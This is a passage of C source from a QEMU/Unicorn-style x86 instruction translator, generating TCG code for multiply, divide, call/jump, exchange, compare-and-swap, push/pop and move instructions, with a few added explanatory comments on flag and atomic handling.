tcg_gen_mulu2_i64(tcg_ctx, tcg_ctx->cpu_regs[R_EAX], tcg_ctx->cpu_regs[R_EDX], s->T0, tcg_ctx->cpu_regs[R_EAX]); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_regs[R_EAX]); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_regs[R_EDX]); set_cc_op(s, CC_OP_MULQ); break; #endif } break; case 5: /* imul */ switch(ot) { case MO_8: gen_op_mov_v_reg(s, MO_8, s->T1, R_EAX); tcg_gen_ext8s_tl(tcg_ctx, s->T0, s->T0); 
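/* Added commentary: both operands are sign-extended so the plain
   multiply below produces the full signed product; cpu_cc_src is then
   set to the product minus its sign-extended low half, which is
   non-zero exactly when the product overflows the narrow destination,
   and that drives CF/OF. */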
tcg_gen_ext8s_tl(tcg_ctx, s->T1, s->T1); /* XXX: use 32 bit mul which could be faster */ tcg_gen_mul_tl(tcg_ctx, s->T0, s->T0, s->T1); gen_op_mov_reg_v(s, MO_16, R_EAX, s->T0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); tcg_gen_ext8s_tl(tcg_ctx, s->tmp0, s->T0); tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T0, s->tmp0); set_cc_op(s, CC_OP_MULB); break; case MO_16: gen_op_mov_v_reg(s, MO_16, s->T1, R_EAX); tcg_gen_ext16s_tl(tcg_ctx, s->T0, s->T0); tcg_gen_ext16s_tl(tcg_ctx, s->T1, s->T1); /* XXX: use 32 bit mul which could be faster */ tcg_gen_mul_tl(tcg_ctx, s->T0, s->T0, s->T1); gen_op_mov_reg_v(s, MO_16, R_EAX, s->T0); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); tcg_gen_ext16s_tl(tcg_ctx, s->tmp0, s->T0); tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T0, s->tmp0); tcg_gen_shri_tl(tcg_ctx, s->T0, s->T0, 16); gen_op_mov_reg_v(s, MO_16, R_EDX, s->T0); set_cc_op(s, CC_OP_MULW); break; default: case MO_32: tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp3_i32, tcg_ctx->cpu_regs[R_EAX]); tcg_gen_muls2_i32(tcg_ctx, s->tmp2_i32, s->tmp3_i32, s->tmp2_i32, s->tmp3_i32); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[R_EAX], s->tmp2_i32); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[R_EDX], s->tmp3_i32); tcg_gen_sari_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, 31); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_regs[R_EAX]); tcg_gen_sub_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, s->tmp3_i32); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->tmp2_i32); set_cc_op(s, CC_OP_MULL); break; #ifdef TARGET_X86_64 case MO_64: tcg_gen_muls2_i64(tcg_ctx, tcg_ctx->cpu_regs[R_EAX], tcg_ctx->cpu_regs[R_EDX], s->T0, tcg_ctx->cpu_regs[R_EAX]); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_regs[R_EAX]); tcg_gen_sari_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_regs[R_EAX], 63); tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_regs[R_EDX]); set_cc_op(s, CC_OP_MULQ); break; #endif } break; case 6: /* div */ switch(ot) { case MO_8: gen_helper_divb_AL(tcg_ctx, tcg_ctx->cpu_env, s->T0); break; case MO_16: gen_helper_divw_AX(tcg_ctx, tcg_ctx->cpu_env, s->T0); break; default: case MO_32: gen_helper_divl_EAX(tcg_ctx, tcg_ctx->cpu_env, s->T0); break; #ifdef TARGET_X86_64 case MO_64: gen_helper_divq_EAX(tcg_ctx, tcg_ctx->cpu_env, s->T0); break; #endif } break; case 7: /* idiv */ switch(ot) { case MO_8: gen_helper_idivb_AL(tcg_ctx, tcg_ctx->cpu_env, s->T0); break; case MO_16: gen_helper_idivw_AX(tcg_ctx, tcg_ctx->cpu_env, s->T0); break; default: case MO_32: gen_helper_idivl_EAX(tcg_ctx, tcg_ctx->cpu_env, s->T0); break; #ifdef TARGET_X86_64 case MO_64: gen_helper_idivq_EAX(tcg_ctx, tcg_ctx->cpu_env, s->T0); break; #endif } break; default: goto unknown_op; } break; case 0xfe: /* GRP4 */ case 0xff: /* GRP5 */ ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; rm = (modrm & 7) | REX_B(s); op = (modrm >> 3) & 7; if (op >= 2 && b == 0xfe) { goto unknown_op; } if (CODE64(s)) { if (op == 2 || op == 4) { /* operand size for jumps is 64 bit */ ot = MO_64; } else if (op == 3 || op == 5) { ot = dflag != MO_16 ? 
MO_32 + (rex_w == 1) : MO_16; } else if (op == 6) { /* default push size is 64 bit */ ot = mo_pushpop(s, dflag); } } if (mod != 3) { gen_lea_modrm(env, s, modrm); if (op >= 2 && op != 3 && op != 5) gen_op_ld_v(s, ot, s->T0, s->A0); } else { gen_op_mov_v_reg(s, ot, s->T0, rm); } switch(op) { case 0: /* inc Ev */ if (mod != 3) opreg = OR_TMP0; else opreg = rm; gen_inc(s, ot, opreg, 1); break; case 1: /* dec Ev */ if (mod != 3) opreg = OR_TMP0; else opreg = rm; gen_inc(s, ot, opreg, -1); break; case 2: /* call Ev */ /* XXX: optimize if memory (no 'and' is necessary) */ if (dflag == MO_16) { tcg_gen_ext16u_tl(tcg_ctx, s->T0, s->T0); } next_eip = s->pc - s->cs_base; tcg_gen_movi_tl(tcg_ctx, s->T1, next_eip); gen_push_v(s, s->T1); gen_op_jmp_v(tcg_ctx, s->T0); gen_bnd_jmp(s); gen_jr(s, s->T0); break; case 3: /* lcall Ev */ if (mod == 3) { goto illegal_op; } gen_op_ld_v(s, ot, s->T1, s->A0); gen_add_A0_im(s, 1 << ot); gen_op_ld_v(s, MO_16, s->T0, s->A0); do_lcall: if (s->pe && !s->vm86) { tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); gen_helper_lcall_protected(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32, s->T1, tcg_const_i32(tcg_ctx, dflag - 1), tcg_const_tl(tcg_ctx, s->pc - s->cs_base)); } else { tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); gen_helper_lcall_real(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32, s->T1, tcg_const_i32(tcg_ctx, dflag - 1), tcg_const_i32(tcg_ctx, s->pc - s->cs_base)); } tcg_gen_ld_tl(tcg_ctx, s->tmp4, tcg_ctx->cpu_env, offsetof(CPUX86State, eip)); gen_jr(s, s->tmp4); break; case 4: /* jmp Ev */ if (dflag == MO_16) { tcg_gen_ext16u_tl(tcg_ctx, s->T0, s->T0); } gen_op_jmp_v(tcg_ctx, s->T0); gen_bnd_jmp(s); gen_jr(s, s->T0); break; case 5: /* ljmp Ev */ if (mod == 3) { goto illegal_op; } gen_op_ld_v(s, ot, s->T1, s->A0); gen_add_A0_im(s, 1 << ot); gen_op_ld_v(s, MO_16, s->T0, s->A0); do_ljmp: if (s->pe && !s->vm86) { tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); gen_helper_ljmp_protected(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32, s->T1, tcg_const_tl(tcg_ctx, s->pc - s->cs_base)); } else { gen_op_movl_seg_T0_vm(s, R_CS); gen_op_jmp_v(tcg_ctx, s->T1); } tcg_gen_ld_tl(tcg_ctx, s->tmp4, tcg_ctx->cpu_env, offsetof(CPUX86State, eip)); gen_jr(s, s->tmp4); break; case 6: /* push Ev */ gen_push_v(s, s->T0); break; default: goto unknown_op; } break; case 0x84: /* test Ev, Gv */ case 0x85: ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); gen_op_mov_v_reg(s, ot, s->T1, reg); gen_op_testl_T0_T1_cc(s); set_cc_op(s, CC_OP_LOGICB + ot); break; case 0xa8: /* test eAX, Iv */ case 0xa9: ot = mo_b_d(b, dflag); val = insn_get(env, s, ot); gen_op_mov_v_reg(s, ot, s->T0, OR_EAX); tcg_gen_movi_tl(tcg_ctx, s->T1, val); gen_op_testl_T0_T1_cc(s); set_cc_op(s, CC_OP_LOGICB + ot); break; case 0x98: /* CWDE/CBW */ switch (dflag) { #ifdef TARGET_X86_64 case MO_64: gen_op_mov_v_reg(s, MO_32, s->T0, R_EAX); tcg_gen_ext32s_tl(tcg_ctx, s->T0, s->T0); gen_op_mov_reg_v(s, MO_64, R_EAX, s->T0); break; #endif case MO_32: gen_op_mov_v_reg(s, MO_16, s->T0, R_EAX); tcg_gen_ext16s_tl(tcg_ctx, s->T0, s->T0); gen_op_mov_reg_v(s, MO_32, R_EAX, s->T0); break; case MO_16: gen_op_mov_v_reg(s, MO_8, s->T0, R_EAX); tcg_gen_ext8s_tl(tcg_ctx, s->T0, s->T0); gen_op_mov_reg_v(s, MO_16, R_EAX, s->T0); break; default: tcg_abort(); } break; case 0x99: /* CDQ/CWD */ switch (dflag) { #ifdef TARGET_X86_64 case MO_64: gen_op_mov_v_reg(s, MO_64, s->T0, R_EAX); tcg_gen_sari_tl(tcg_ctx, s->T0, s->T0, 63); gen_op_mov_reg_v(s, MO_64, R_EDX, s->T0); 
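/* Added commentary: this is CQO: the arithmetic shift right by 63
   replicates the sign bit of RAX into every bit of RDX, yielding the
   sign extension RDX:RAX. */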
break; #endif case MO_32: gen_op_mov_v_reg(s, MO_32, s->T0, R_EAX); tcg_gen_ext32s_tl(tcg_ctx, s->T0, s->T0); tcg_gen_sari_tl(tcg_ctx, s->T0, s->T0, 31); gen_op_mov_reg_v(s, MO_32, R_EDX, s->T0); break; case MO_16: gen_op_mov_v_reg(s, MO_16, s->T0, R_EAX); tcg_gen_ext16s_tl(tcg_ctx, s->T0, s->T0); tcg_gen_sari_tl(tcg_ctx, s->T0, s->T0, 15); gen_op_mov_reg_v(s, MO_16, R_EDX, s->T0); break; default: tcg_abort(); } break; case 0x1af: /* imul Gv, Ev */ case 0x69: /* imul Gv, Ev, I */ case 0x6b: ot = dflag; modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; if (b == 0x69) s->rip_offset = insn_const_size(ot); else if (b == 0x6b) s->rip_offset = 1; gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); if (b == 0x69) { val = insn_get(env, s, ot); tcg_gen_movi_tl(tcg_ctx, s->T1, val); } else if (b == 0x6b) { val = (int8_t)insn_get(env, s, MO_8); tcg_gen_movi_tl(tcg_ctx, s->T1, val); } else { gen_op_mov_v_reg(s, ot, s->T1, reg); } switch (ot) { #ifdef TARGET_X86_64 case MO_64: tcg_gen_muls2_i64(tcg_ctx, tcg_ctx->cpu_regs[reg], s->T1, s->T0, s->T1); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_regs[reg]); tcg_gen_sari_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_dst, 63); tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, s->T1); break; #endif case MO_32: tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp3_i32, s->T1); tcg_gen_muls2_i32(tcg_ctx, s->tmp2_i32, s->tmp3_i32, s->tmp2_i32, s->tmp3_i32); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], s->tmp2_i32); tcg_gen_sari_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, 31); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_regs[reg]); tcg_gen_sub_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, s->tmp3_i32); tcg_gen_extu_i32_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->tmp2_i32); break; default: tcg_gen_ext16s_tl(tcg_ctx, s->T0, s->T0); tcg_gen_ext16s_tl(tcg_ctx, s->T1, s->T1); /* XXX: use 32 bit mul which could be faster */ tcg_gen_mul_tl(tcg_ctx, s->T0, s->T0, s->T1); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0); tcg_gen_ext16s_tl(tcg_ctx, s->tmp0, s->T0); tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_cc_src, s->T0, s->tmp0); gen_op_mov_reg_v(s, ot, reg, s->T0); break; } set_cc_op(s, CC_OP_MULB + ot); break; case 0x1c0: case 0x1c1: /* xadd Ev, Gv */ ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; mod = (modrm >> 6) & 3; gen_op_mov_v_reg(s, ot, s->T0, reg); if (mod == 3) { rm = (modrm & 7) | REX_B(s); gen_op_mov_v_reg(s, ot, s->T1, rm); tcg_gen_add_tl(tcg_ctx, s->T0, s->T0, s->T1); gen_op_mov_reg_v(s, ot, reg, s->T1); gen_op_mov_reg_v(s, ot, rm, s->T0); } else { gen_lea_modrm(env, s, modrm); if (s->prefix & PREFIX_LOCK) { tcg_gen_atomic_fetch_add_tl(tcg_ctx, s->T1, s->A0, s->T0, s->mem_index, ot | MO_LE); tcg_gen_add_tl(tcg_ctx, s->T0, s->T0, s->T1); } else { gen_op_ld_v(s, ot, s->T1, s->A0); tcg_gen_add_tl(tcg_ctx, s->T0, s->T0, s->T1); gen_op_st_v(s, ot, s->T0, s->A0); } gen_op_mov_reg_v(s, ot, reg, s->T1); } gen_op_update2_cc(s); set_cc_op(s, CC_OP_ADDB + ot); break; case 0x1b0: case 0x1b1: /* cmpxchg Ev, Gv */ { TCGv oldv, newv, cmpv; ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; mod = (modrm >> 6) & 3; oldv = tcg_temp_new(tcg_ctx); newv = tcg_temp_new(tcg_ctx); cmpv = tcg_temp_new(tcg_ctx); gen_op_mov_v_reg(s, ot, newv, reg); tcg_gen_mov_tl(tcg_ctx, cmpv, tcg_ctx->cpu_regs[R_EAX]); if (s->prefix & PREFIX_LOCK) { if (mod == 3) { goto illegal_op; } gen_lea_modrm(env, s, modrm); 
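/* Added commentary: the LOCK form maps directly onto a host atomic
   compare-and-swap; oldv receives the prior memory value and is
   copied to EAX unconditionally, which is harmless on success (it
   already equals EAX there) and required on failure. */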
tcg_gen_atomic_cmpxchg_tl(tcg_ctx, oldv, s->A0, cmpv, newv, s->mem_index, ot | MO_LE); gen_op_mov_reg_v(s, ot, R_EAX, oldv); } else { if (mod == 3) { rm = (modrm & 7) | REX_B(s); gen_op_mov_v_reg(s, ot, oldv, rm); } else { gen_lea_modrm(env, s, modrm); gen_op_ld_v(s, ot, oldv, s->A0); rm = 0; /* avoid warning */ } gen_extu(tcg_ctx, ot, oldv); gen_extu(tcg_ctx, ot, cmpv); /* store value = (old == cmp ? new : old); */ tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, newv, oldv, cmpv, newv, oldv); if (mod == 3) { gen_op_mov_reg_v(s, ot, R_EAX, oldv); gen_op_mov_reg_v(s, ot, rm, newv); } else { /* Perform an unconditional store cycle like physical cpu; must be before changing accumulator to ensure idempotency if the store faults and the instruction is restarted */ gen_op_st_v(s, ot, newv, s->A0); gen_op_mov_reg_v(s, ot, R_EAX, oldv); } } tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, oldv); tcg_gen_mov_tl(tcg_ctx, s->cc_srcT, cmpv); tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, cmpv, oldv); set_cc_op(s, CC_OP_SUBB + ot); tcg_temp_free(tcg_ctx, oldv); tcg_temp_free(tcg_ctx, newv); tcg_temp_free(tcg_ctx, cmpv); } break; case 0x1c7: /* cmpxchg8b */ modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; switch ((modrm >> 3) & 7) { case 1: /* CMPXCHG8, CMPXCHG16 */ if (mod == 3) { goto illegal_op; } #ifdef TARGET_X86_64 if (dflag == MO_64) { if (!(s->cpuid_ext_features & CPUID_EXT_CX16)) { goto illegal_op; } gen_lea_modrm(env, s, modrm); if ((s->prefix & PREFIX_LOCK) && (tb_cflags(s->base.tb) & CF_PARALLEL)) { gen_helper_cmpxchg16b(tcg_ctx, tcg_ctx->cpu_env, s->A0); } else { gen_helper_cmpxchg16b_unlocked(tcg_ctx, tcg_ctx->cpu_env, s->A0); } set_cc_op(s, CC_OP_EFLAGS); break; } #endif if (!(s->cpuid_features & CPUID_CX8)) { goto illegal_op; } gen_lea_modrm(env, s, modrm); if ((s->prefix & PREFIX_LOCK) && (tb_cflags(s->base.tb) & CF_PARALLEL)) { gen_helper_cmpxchg8b(tcg_ctx, tcg_ctx->cpu_env, s->A0); } else { gen_helper_cmpxchg8b_unlocked(tcg_ctx, tcg_ctx->cpu_env, s->A0); } set_cc_op(s, CC_OP_EFLAGS); break; case 7: /* RDSEED */ case 6: /* RDRAND */ if (mod != 3 || (s->prefix & (PREFIX_LOCK | PREFIX_REPZ | PREFIX_REPNZ)) || !(s->cpuid_ext_features & CPUID_EXT_RDRAND)) { goto illegal_op; } if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_rdrand(tcg_ctx, s->T0, tcg_ctx->cpu_env); rm = (modrm & 7) | REX_B(s); gen_op_mov_reg_v(s, dflag, rm, s->T0); set_cc_op(s, CC_OP_EFLAGS); if (tb_cflags(s->base.tb) & CF_USE_ICOUNT) { gen_jmp(s, s->pc - s->cs_base); } break; default: goto illegal_op; } break; /**************************/ /* push/pop */ case 0x50: /* push */ case 0x51: /* push */ case 0x52: /* push */ case 0x53: /* push */ case 0x54: /* push */ case 0x55: /* push */ case 0x56: /* push */ case 0x57: /* push */ gen_op_mov_v_reg(s, MO_32, s->T0, (b & 7) | REX_B(s)); gen_push_v(s, s->T0); break; case 0x58: /* pop */ case 0x59: /* pop */ case 0x5a: /* pop */ case 0x5b: /* pop */ case 0x5c: /* pop */ case 0x5d: /* pop */ case 0x5e: /* pop */ case 0x5f: /* pop */ ot = gen_pop_T0(s); /* NOTE: order is important for pop %sp */ gen_pop_update(s, ot); gen_op_mov_reg_v(s, ot, (b & 7) | REX_B(s), s->T0); break; case 0x60: /* pusha */ if (CODE64(s)) goto illegal_op; gen_pusha(s); break; case 0x61: /* popa */ if (CODE64(s)) goto illegal_op; gen_popa(s); break; case 0x68: /* push Iv */ case 0x6a: ot = mo_pushpop(s, dflag); if (b == 0x68) val = insn_get(env, s, ot); else val = (int8_t)insn_get(env, s, MO_8); tcg_gen_movi_tl(tcg_ctx, s->T0, val); gen_push_v(s, s->T0); break; case 0x8f: /* pop Ev */ 
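/* Added commentary, best-effort reading: POP into memory computes the
   destination address with ESP already incremented per the ISA, and
   popl_esp_hack appears to bias ESP-based address computation by the
   pop size so the store sees the post-pop stack pointer. */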
modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; ot = gen_pop_T0(s); if (mod == 3) { /* NOTE: order is important for pop %sp */ gen_pop_update(s, ot); rm = (modrm & 7) | REX_B(s); gen_op_mov_reg_v(s, ot, rm, s->T0); } else { /* NOTE: order is important too for MMU exceptions */ s->popl_esp_hack = 1 << ot; gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 1); s->popl_esp_hack = 0; gen_pop_update(s, ot); } break; case 0xc8: /* enter */ { int level; val = x86_lduw_code(env, s); level = x86_ldub_code(env, s); gen_enter(s, val, level); } break; case 0xc9: /* leave */ gen_leave(s); break; case 0x06: /* push es */ case 0x0e: /* push cs */ case 0x16: /* push ss */ case 0x1e: /* push ds */ if (CODE64(s)) goto illegal_op; gen_op_movl_T0_seg(s, b >> 3); gen_push_v(s, s->T0); break; case 0x1a0: /* push fs */ case 0x1a8: /* push gs */ gen_op_movl_T0_seg(s, (b >> 3) & 7); gen_push_v(s, s->T0); break; case 0x07: /* pop es */ case 0x17: /* pop ss */ case 0x1f: /* pop ds */ if (CODE64(s)) goto illegal_op; reg = b >> 3; ot = gen_pop_T0(s); gen_movl_seg_T0(s, reg); gen_pop_update(s, ot); /* Note that reg == R_SS in gen_movl_seg_T0 always sets is_jmp. */ if (s->base.is_jmp) { gen_jmp_im(s, s->pc - s->cs_base); if (reg == R_SS) { s->tf = 0; gen_eob_inhibit_irq(s, true); } else { gen_eob(s); } } break; case 0x1a1: /* pop fs */ case 0x1a9: /* pop gs */ ot = gen_pop_T0(s); gen_movl_seg_T0(s, (b >> 3) & 7); gen_pop_update(s, ot); if (s->base.is_jmp) { gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); } break; /**************************/ /* mov */ case 0x88: case 0x89: /* mov Gv, Ev */ ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; /* generate a generic store */ gen_ldst_modrm(env, s, modrm, ot, reg, 1); break; case 0xc6: case 0xc7: /* mov Ev, Iv */ ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; reg = ((modrm >> 3) & 7) | rex_r; if (mod != 3) { if (reg != 0) goto illegal_op; s->rip_offset = insn_const_size(ot); gen_lea_modrm(env, s, modrm); } else { if (reg != 0 && reg != 7) goto illegal_op; } val = insn_get(env, s, ot); tcg_gen_movi_tl(tcg_ctx, s->T0, val); if (mod != 3) { gen_op_st_v(s, ot, s->T0, s->A0); } else { gen_op_mov_reg_v(s, ot, (modrm & 7) | REX_B(s), s->T0); } break; case 0x8a: case 0x8b: /* mov Ev, Gv */ ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); gen_op_mov_reg_v(s, ot, reg, s->T0); break; case 0x8e: /* mov seg, Gv */ modrm = x86_ldub_code(env, s); reg = (modrm >> 3) & 7; if (reg >= 6 || reg == R_CS) goto illegal_op; gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); gen_movl_seg_T0(s, reg); /* Note that reg == R_SS in gen_movl_seg_T0 always sets is_jmp. */ if (s->base.is_jmp) { gen_jmp_im(s, s->pc - s->cs_base); if (reg == R_SS) { s->tf = 0; gen_eob_inhibit_irq(s, true); } else { gen_eob(s); } } break; case 0x8c: /* mov Gv, seg */ modrm = x86_ldub_code(env, s); reg = (modrm >> 3) & 7; mod = (modrm >> 6) & 3; if (reg >= 6) goto illegal_op; gen_op_movl_T0_seg(s, reg); ot = mod == 3 ? dflag : MO_16; gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 1); break; case 0x1b6: /* movzbS Gv, Eb */ case 0x1b7: /* movzwS Gv, Eb */ case 0x1be: /* movsbS Gv, Eb */ case 0x1bf: /* movswS Gv, Eb */ { MemOp d_ot; MemOp s_ot; /* d_ot is the size of destination */ d_ot = dflag; /* ot is the size of source */ ot = (b & 1) + MO_8; /* s_ot is the sign+size of source */ s_ot = b & 8 ? 
MO_SIGN | ot : ot; modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; mod = (modrm >> 6) & 3; rm = (modrm & 7) | REX_B(s); if (mod == 3) { if (s_ot == MO_SB && byte_reg_is_xH(s, rm)) { tcg_gen_sextract_tl(tcg_ctx, s->T0, tcg_ctx->cpu_regs[rm - 4], 8, 8); } else { gen_op_mov_v_reg(s, ot, s->T0, rm); switch (s_ot) { case MO_UB: tcg_gen_ext8u_tl(tcg_ctx, s->T0, s->T0); break; case MO_SB: tcg_gen_ext8s_tl(tcg_ctx, s->T0, s->T0); break; case MO_UW: tcg_gen_ext16u_tl(tcg_ctx, s->T0, s->T0); break; default: case MO_SW: tcg_gen_ext16s_tl(tcg_ctx, s->T0, s->T0); break; } } gen_op_mov_reg_v(s, d_ot, reg, s->T0); } else { gen_lea_modrm(env, s, modrm); gen_op_ld_v(s, s_ot, s->T0, s->A0); gen_op_mov_reg_v(s, d_ot, reg, s->T0); } } break; case 0x8d: /* lea */ modrm = x86_ldub_code(env, s); mod = (modrm >> 6) & 3; if (mod == 3) goto illegal_op; reg = ((modrm >> 3) & 7) | rex_r; { AddressParts a = gen_lea_modrm_0(env, s, modrm); TCGv ea = gen_lea_modrm_1(s, a); gen_lea_v_seg(s, s->aflag, ea, -1, -1); gen_op_mov_reg_v(s, dflag, reg, s->A0); } break; case 0xa0: /* mov EAX, Ov */ case 0xa1: case 0xa2: /* mov Ov, EAX */ case 0xa3: { target_ulong offset_addr; ot = mo_b_d(b, dflag); switch (s->aflag) { #ifdef TARGET_X86_64 case MO_64: offset_addr = x86_ldq_code(env, s); break; #endif default: offset_addr = insn_get(env, s, s->aflag); break; } tcg_gen_movi_tl(tcg_ctx, s->A0, offset_addr); gen_add_A0_ds_seg(s); if ((b & 2) == 0) { gen_op_ld_v(s, ot, s->T0, s->A0); gen_op_mov_reg_v(s, ot, R_EAX, s->T0); } else { gen_op_mov_v_reg(s, ot, s->T0, R_EAX); gen_op_st_v(s, ot, s->T0, s->A0); } } break; case 0xd7: /* xlat */ tcg_gen_mov_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[R_EBX]); tcg_gen_ext8u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_regs[R_EAX]); tcg_gen_add_tl(tcg_ctx, s->A0, s->A0, s->T0); gen_extu(tcg_ctx, s->aflag, s->A0); gen_add_A0_ds_seg(s); gen_op_ld_v(s, MO_8, s->T0, s->A0); gen_op_mov_reg_v(s, MO_8, R_EAX, s->T0); break; case 0xb0: /* mov R, Ib */ case 0xb1: /* mov R, Ib */ case 0xb2: /* mov R, Ib */ case 0xb3: /* mov R, Ib */ case 0xb4: /* mov R, Ib */ case 0xb5: /* mov R, Ib */ case 0xb6: /* mov R, Ib */ case 0xb7: /* mov R, Ib */ val = insn_get(env, s, MO_8); tcg_gen_movi_tl(tcg_ctx, s->T0, val); gen_op_mov_reg_v(s, MO_8, (b & 7) | REX_B(s), s->T0); break; case 0xb8: /* mov R, Iv */ case 0xb9: /* mov R, Iv */ case 0xba: /* mov R, Iv */ case 0xbb: /* mov R, Iv */ case 0xbc: /* mov R, Iv */ case 0xbd: /* mov R, Iv */ case 0xbe: /* mov R, Iv */ case 0xbf: /* mov R, Iv */ #ifdef TARGET_X86_64 if (dflag == MO_64) { uint64_t tmp; /* 64 bit case */ tmp = x86_ldq_code(env, s); reg = (b & 7) | REX_B(s); tcg_gen_movi_tl(tcg_ctx, s->T0, tmp); gen_op_mov_reg_v(s, MO_64, reg, s->T0); } else #endif { ot = dflag; val = insn_get(env, s, ot); reg = (b & 7) | REX_B(s); tcg_gen_movi_tl(tcg_ctx, s->T0, val); gen_op_mov_reg_v(s, ot, reg, s->T0); } break; case 0x91: /* xchg R, EAX */ case 0x92: /* xchg R, EAX */ case 0x93: /* xchg R, EAX */ case 0x94: /* xchg R, EAX */ case 0x95: /* xchg R, EAX */ case 0x96: /* xchg R, EAX */ case 0x97: /* xchg R, EAX */ do_xchg_reg_eax: ot = dflag; reg = (b & 7) | REX_B(s); rm = R_EAX; goto do_xchg_reg; case 0x86: case 0x87: /* xchg Ev, Gv */ ot = mo_b_d(b, dflag); modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; mod = (modrm >> 6) & 3; if (mod == 3) { rm = (modrm & 7) | REX_B(s); do_xchg_reg: gen_op_mov_v_reg(s, ot, s->T0, reg); gen_op_mov_v_reg(s, ot, s->T1, rm); gen_op_mov_reg_v(s, ot, rm, s->T0); gen_op_mov_reg_v(s, ot, reg, s->T1); } else { gen_lea_modrm(env, s, 
modrm); gen_op_mov_v_reg(s, ot, s->T0, reg); /* for xchg, lock is implicit */ tcg_gen_atomic_xchg_tl(tcg_ctx, s->T1, s->A0, s->T0, s->mem_index, ot | MO_LE); gen_op_mov_reg_v(s, ot, reg, s->T1); } break; case 0xc4: /* les Gv */ /* In CODE64 this is VEX3; see above. */ op = R_ES; goto do_lxx; case 0xc5: /* lds Gv */ /* In CODE64 this is VEX2; see above. */ op = R_DS; goto do_lxx; case 0x1b2: /* lss Gv */ op = R_SS; goto do_lxx; case 0x1b4: /* lfs Gv */ op = R_FS; goto do_lxx; case 0x1b5: /* lgs Gv */ op = R_GS; do_lxx: ot = dflag != MO_16 ? MO_32 : MO_16; modrm = x86_ldub_code(env, s); reg = ((modrm >> 3) & 7) | rex_r; mod = (modrm >> 6) & 3; if (mod == 3) goto illegal_op; gen_lea_modrm(env, s, modrm); gen_op_ld_v(s, ot, s->T1, s->A0); gen_add_A0_im(s, 1 << ot); /* load the segment first to handle exceptions properly */ gen_op_ld_v(s, MO_16, s->T0, s->A0); gen_movl_seg_T0(s, op); /* then put the data */ gen_op_mov_reg_v(s, ot, reg, s->T1); if (s->base.is_jmp) { gen_jmp_im(s, s->pc - s->cs_base); gen_eob(s); } break; /************************/ /* shifts */ case 0xc0: case 0xc1: /* shift Ev,Ib */ shift = 2; grp2_label: { 